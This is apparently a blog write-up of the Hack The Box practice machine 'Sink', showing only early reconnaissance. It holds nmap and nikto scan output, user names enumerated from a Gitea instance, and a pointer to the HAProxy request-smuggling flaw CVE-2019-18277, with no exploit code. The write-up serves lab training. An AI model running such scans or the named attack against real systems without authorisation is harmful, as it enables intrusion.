Sink

Hack The Box Machines No Comments
$ sudo nmap -p- -T4 -A 10.10.10.225
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=db4459e435edd5b6; Path=/; HttpOnly
|     Set-Cookie: _csrf=_R16T-Xgg2R9zqqAodtLZUaAwyg6MTYyMDg2MzUwNTkwMTgyOTAxNA; Path=/; Expires=Thu, 13 May 2021 23:51:45 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 12 May 2021 23:51:45 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=d82d2cfb01820471; Path=/; HttpOnly
|     Set-Cookie: _csrf=PPTy3qhKB5F45tJFE7maLHJIAq06MTYyMDg2MzUxMTA2MTQxMDgwNQ; Path=/; Expires=Thu, 13 May 2021 23:51:51 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 12 May 2021 23:51:51 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
5000/tcp open  http    Gunicorn 20.0.0
|_http-server-header: gunicorn/20.0.0
|_http-title: Sink Devops

$ nikto -h http://10.10.10.225:3000
+ Server: No banner retrieved
+ Cookie lang created without the httponly flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  20 error(s) and 3 item(s) reported on remote host
$ nikto -h http://10.10.10.225:5000
+ Server: gunicorn/20.0.0
+ Retrieved via header: haproxy
+ Retrieved x-served-by header: 3a88a256bfea
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-served-by' found, with contents: 3a88a256bfea
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  20 error(s) and 7 item(s) reported on remote host

http://10.10.10.225:3000
Powered by Gitea Version: 1.12.6 Page: 0ms Template: 0ms 
root, david, marcus
http://10.10.10.225:3000/api/swagger
http://10.10.10.225:3000/vendor/librejs.html

http://10.10.10.225:5000
admin@sink.htb 

$ echo "10.10.10.225 sink.htb" | sudo tee -a /etc/hosts
CVE-2019-18277 request smuggling vulnerability 
https://nathandavison.com/blog/haproxy-http-request-smuggling

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation